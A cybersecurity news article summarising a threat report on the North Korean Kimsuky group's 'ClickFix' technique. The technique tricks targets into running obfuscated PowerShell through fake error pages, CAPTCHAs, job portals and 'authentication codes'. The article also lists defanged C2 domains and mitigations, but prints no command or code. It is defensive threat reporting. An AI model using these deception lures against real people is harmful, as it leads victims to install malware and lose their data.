ClickFix Unmasked: How North Korea’s Kimsuky Group Turned PowerShell into a Weapon of Psychological Deception
Ddos 
Diagram of the “BabyShark” Threat Series | Image: Genians
In its latest threat intelligence report, the Genians Security Center (GSC) has uncovered a new evolution in North Korean cyber operations—one that weaponizes social engineering to a chilling degree. The report reveals the expanded use of a deceptive strategy known as “ClickFix,” attributed to the state-sponsored APT group Kimsuky, which has been actively targeting experts and institutions through spear-phishing, fake job portals, and obfuscated PowerShell commands.
“ClickFix is a deceptive tactic that tricks users into unknowingly participating in the attack chain themselves,” the report warns.
The term “ClickFix” first surfaced in April 2024 through Proofpoint’s research, describing an attack where users, thinking they were fixing a browser error, copied PowerShell commands from a fake Chrome error message—unwittingly unleashing malware. By early 2025, GSC confirmed that Kimsuky had weaponized this technique, integrating it into their long-running “BabyShark” threat activity.
The brilliance—and danger—of ClickFix lies in its subtlety. Unlike typical phishing emails laden with red flags, ClickFix creates trust through familiarity. It masquerades as:
- A PDF manual with multilingual instructions
- A job application site for defense researchers
- A spoofed security settings page of a Korean web portal
One phishing case in March 2025 saw attackers impersonate a U.S. national security aide, asking the target to access a “secure document” using an “authentication code” from a text file. The catch? The code was actually a reverse-obfuscated PowerShell command, visually scrambled to avoid suspicion:
Upon execution, this command connected the victim’s machine to a command-and-control (C2) server, establishing persistence and harvesting sensitive information.
GSC’s report highlights multiple delivery methods:
- VBS-Based Spear Phishing: Targets were lured with interview requests, receiving a malicious VBS file via pCloud that initiated data exfiltration to the C2 domain konamo[.]xyz.
- Web-Based Exploits: A fake job portal prompted users to install Chrome Remote Desktop, giving attackers SSH-based remote access to the victim’s device.
- CAPTCHA Trickery: A counterfeit web portal asked users to complete a CAPTCHA, which led to PowerShell code execution disguised as routine security behavior.
All variations lead to a similar result: complete system compromise, often via familiar names like HncUpdateTray.exe, an AutoIt script repurposed for data theft.
Beyond infrastructure overlap and malware reuse, the GSC report highlights something more subtle: linguistic fingerprints.
In phishing messages, North Korean-style vocabulary such as “래일” instead of “내일” (tomorrow), and terms like “지령” (command) and “체계 정보” (system information), betray the origin. This linguistic analysis strengthens attribution to Kimsuky, especially when combined with technical markers like recurring C2 addresses and code patterns.
Kimsuky’s infrastructure stretches across domains like raedom[.]store, securedrive.fin-tech[.]com, and kida.plusdocs.kro[.]kr, often hosted on South Korean and U.S.-based servers. IPs traced to China and Vietnam were also involved, indicating a geographically distributed operation.
The infection chain frequently uses Proton Drive or Google Drive for file delivery, further cloaking malicious files in legitimacy. The MD5 hashes and variant information provided by GSC suggest rapid iteration and targeted deployment.
“ClickFix is ultimately a psychological manipulation tactic that leads users to unknowingly run malicious commands, step by step, without recognizing the threat,” the GSC report emphasizes.
To mitigate such advanced threats, security teams must:
- Deploy Endpoint Detection and Response (EDR) tools to identify unusual command-line behavior.
- Invest in security awareness training—especially highlighting real-world attack simulations.
- Harden browsers and disable unnecessary PowerShell access for non-administrative users.
Related Posts:
- North Korean APT37’s “ToyBox Story”: Stealthy Attacks Unveiled
- State-Sponsored Actors Adopt ClickFix Technique in Cyber Espionage
- Beware of Fake Google Meet Invites: ClickFix Campaign Spreading Infostealers
- ClickFix: The Rising Threat of Clipboard-Based Social Engineering
- Lazarus APT Targets Job Seekers with “Contagious Interview” Campaign Using ClickFix Technique
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
